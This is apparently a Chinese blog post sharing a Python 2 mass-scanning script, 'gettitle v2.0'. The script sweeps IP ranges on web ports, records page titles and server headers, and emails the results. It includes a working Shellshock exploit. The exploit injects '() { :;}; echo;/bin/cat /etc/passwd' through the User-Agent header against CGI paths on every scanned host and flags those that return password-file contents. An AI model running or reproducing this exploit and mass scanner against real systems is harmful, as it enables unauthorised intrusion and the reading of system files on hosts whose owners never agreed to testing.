• python gettitle v2.0


    #!/usr/bin/env python
    # coding=utf-8
    
    import threading
    import requests
    import Queue
    import sys
    import re
    import time
    import warnings
    import datetime
    import argparse
    from email.mime.text import MIMEText
    from email.mime.multipart import MIMEMultipart
    import smtplib
    import httplib
    
    __author__ = 'depycode'
    __version__ = 'gettitle v2.0'
    
    warnings.filterwarnings("ignore")
    
    #ip to num
    def ip2num(ip):
        ip = [int(x) for x in ip.split('.')]
        return ip[0] << 24 | ip[1] << 16 | ip[2] << 8 | ip[3]
    
    #num to ip
    def num2ip(num):
        return '%s.%s.%s.%s'  %((num & 0xff000000) >>24,
                                (num & 0x00ff0000) >>16,
                                (num & 0x0000ff00) >>8,
                                num & 0x000000ff )
    #
    def ip_range(start, end):
        return [num2ip(num) for num in range(ip2num(start), ip2num(end) + 1) if num & 0xff]
    
    
    def bash_exp(host):
        headers = {'User-Agent':'() { :;}; echo;/bin/cat /etc/passwd','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}
        try:
            res = requests.get(host,headers=headers,timeout=8)
            if "root:" in res.content:
                return host
        except:
            pass
    #
    def bThread(iplist):
        threadl = []
        queue = Queue.Queue()
        for host in iplist:
            queue.put(host)
    
        for x in xrange(0, int(SETTHREAD)):
            threadl.append(tThread(queue))
    
        for t in threadl:
            t.start()
        for t in threadl:
            t.join()
    
    #create thread
    class tThread(threading.Thread):
        def __init__(self, queue):
            threading.Thread.__init__(self)
            self.queue = queue
    
        def run(self):
            while not self.queue.empty():
                host = self.queue.get(block=False)
                try:
                    checkServer(host)
                except:
                    continue
    
    def checkServer(host):
        UA = {'user-agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'}
        k = int(host.split(':')[1])
        try:
            if k==443:
                aimurl = "https://"+host
                #print aimurl
                response = requests.get(url = aimurl,headers = UA,verify=False,timeout = 8)
            else:
                aimurl = "http://"+host
                #print aimurl
                response = requests.get(url = aimurl,headers = UA,timeout = 8)
                #print response.headers
            status = response.status_code
            try:
                serverText = response.headers['server']
            except:
                serverText = ""
            try:
                titleText1 = re.findall(r'<title>(.*?)</title>',response.content,re.S)[0]
                try:
                    titleText = titleText1.decode('utf-8').encode('utf-8')
                except:
                    titleText = titleText1.decode('gbk','ignore').encode('utf-8','ignore')
            except:
                titleText = ""
    
            saveData = {"ip":host,"port":str(k),'aimurl':aimurl,"status":status,"server":serverText,"title":titleText}
            print saveData
            Data.append(saveData)
            cgi_poc = ['/cgi-bin/index.cgi','/cgi-bin/login.cgi','/cgi-bin/test-cgi']
            for path in cgi_poc:
                exp_url = aimurl + path
                exp_res = bash_exp(exp_url)
                if exp_res != None:
                    bash_list.append(exp_res)
        except:
            pass
    
    def cmd():
        iplist_a = []
        parser = argparse.ArgumentParser(description='GET TITLE .. Author::depycode')
        group = parser.add_mutually_exclusive_group()
    
        group.add_argument('-i',
                            action="store",
                            dest="iprange",
                            help="use:: python gettitle.py -i 10.100.1.1-10.100.1.254",
        )
        group.add_argument('-f',
                            action="store",
                            dest="ipfile",
                            help="use:: python gettitle.py -f ip.txt",
                            type=str,
        )
        args = parser.parse_args()
        ipfile = args.ipfile
        ip = args.iprange
        if ip:
            iplist_a = ip_range(ip.split('-')[0], ip.split('-')[1])
    
        elif ipfile:
            iplist_tmp = open(ipfile).readlines()
            for i in iplist_tmp:
                iplist_a.append(i.strip())
            
        else:
            parser.print_help()
            exit()
        return iplist_a
    
    def report(data):
        t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))
        filename = 'Title'+'-'+str(t)+".html"
        f = open(filename,"w+")
        table1 = "<meta http-equiv='Content-Type' content='text/html; charset=utf-8'><table border='1'>
    <tr><th>url</th><th>stauts_code</th><th>server</th><th>title</th>
    "
        f.write(table1)
        for i in data:
            rows = "<tr><td><a target='_blank' href='%s'>%s</a></td><td>%s</td><td>%s</td><td>%s</td></tr>
    " %(i['aimurl'],i['ip'],i['status'],i['server'],i['title'])
            f.write(rows)
        table2 = "</table>"
        f.write(table2)
        f.close()
        return filename
    
    def report2txt(data):
        t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))
        filename = "ip-"+str(t)+".txt"
        f = open(filename,"w+")
        for i in data:
            url = i['aimurl']
            f.write(url)
            f.write("
    ")
        f.close()
        return filename
        
    def reportBash(data):
        t = time.strftime('%Y-%m-%d-%H-%M',time.localtime(time.time()))
        filename = 'bash' + str(t) + '.html'
        f = open(filename,'w+')
        table1 = "<meta http-equiv='Content-Type' content='text/html; charset=utf-8'><table border='1'>
    <tr><th>url</th><th>bash_valu</th>
    "
        f.write(table1)
        for i in data:
            rows = "<tr><td><a target='_blank' href='%s'>%s</a></td><td>ON</td></tr>
    " %(i,i)
            f.write(rows)
        table2 = "</table>"
        f.write(table2)
        f.close()
        return filename
    
    def SendMail(f1,f2,f3):
        #创建一个带附件的实例
        msg = MIMEMultipart('alternative')
    
        text = "报告大王-扫描完成"
        att = MIMEText(text, 'plain')
        #构造附件1
        att1 = MIMEText(open(f1, 'rb').read(), 'base64', 'utf-8')
        att1["Content-Type"] = 'application/octet-stream'
        att1["Content-Disposition"] = 'attachment; filename="report.html"'#这里的filename可以任意写,写什么名字,邮件中显示什么名字
    
        att2 = MIMEText(open(f2, 'rb').read(), 'base64', 'utf-8')
        att2["Content-Type"] = 'application/octet-stream'
        att2["Content-Disposition"] = 'attachment; filename="ip.txt"'
        
        att3 = MIMEText(open(f3, 'rb').read(), 'base64', 'utf-8')
        att3["Content-Type"] = 'application/octet-stream'
        att3["Content-Disposition"] = 'attachment; filename="bash.html"'
    
        msg.attach(att)
        msg.attach(att1)
        msg.attach(att2)
        msg.attach(att3)
    
        #加邮件头
        msg['to'] = '*************'
        msg['from'] = '*************'
        msg['subject'] = 'Scan Finished'
        #发送邮件
        try:
            server = smtplib.SMTP()
            server.connect('*************')
            server.login('*************','*************')
            server.sendmail(msg['from'], msg['to'],msg.as_string())
            server.quit()
            print u'发送成功'
        except Exception, e:
            print str(e)
    
    
    if __name__ == '__main__':
    
        global SETTHREAD
        global Data
        global bash_list
        Data = []
        bash_list = []
        starttime = datetime.datetime.now()
        
        try:
            SETTHREAD = 500
            iplist1 = cmd()
            ports = [80,81,8080,8000,8888]
            #ports = [80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,803,806,8094,8000,8001,8002,8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8888,9002,443,873,2601,2604,4848,8008,8104,8880,8877,9999,3128,5432,2049,7001,7002,7003,7004,7005,7006,7007,7008,7009,9200,9871,4440,6082,8099,8649,9000,9090,50000,50030,50070]
            iplist = ['{}:{}'.format(x, y) for x in iplist1 for y in ports]
            print '
    [INFO] Will scan '+str(len(iplist1))+" host...
    "
            bThread(iplist)
            
        except KeyboardInterrupt:
            print 'Keyboard Interrupt!'
            sys.exit()
        filenamehtml_report = report(Data)
        filenametxt_ip = report2txt(Data)
        filenamehtml_report_bash = reportBash(bash_list)
        SendMail(filenamehtml_report,filenametxt_ip,filenamehtml_report_bash)
    
        endtime = datetime.datetime.now()
        print "Finished in "+str((endtime - starttime).seconds)+"S"
    

     

    1:改进了线程 

    2:增加bash漏洞检测

  • 相关阅读:
    Codeforces Round #595 (Div. 3) C题题解
    Educational Codeforces Round 83 (Rated for Div. 2)
    【算法竞赛进阶指南】Supermarket 贪心+并查集
    【算法竞赛进阶指南】字典树 The XOR Longest Path
    【算法竞赛进阶指南】字典树 The XOR Largest Pair
    【算法进阶指南】双端队列 DP+思维
    【算法进阶指南】蚯蚓 队列
    【2019 杭电多校第一场】Path 最短路+最小割
    【2017 ICPC 沈阳】G.Infinite Fraction Path 暴力优化
    【2017 CCPC 秦皇岛】A.Balloon Robot 思维
  • 原文地址:https://www.cnblogs.com/depycode/p/5942407.html
Copyright © 2020-2023  润新知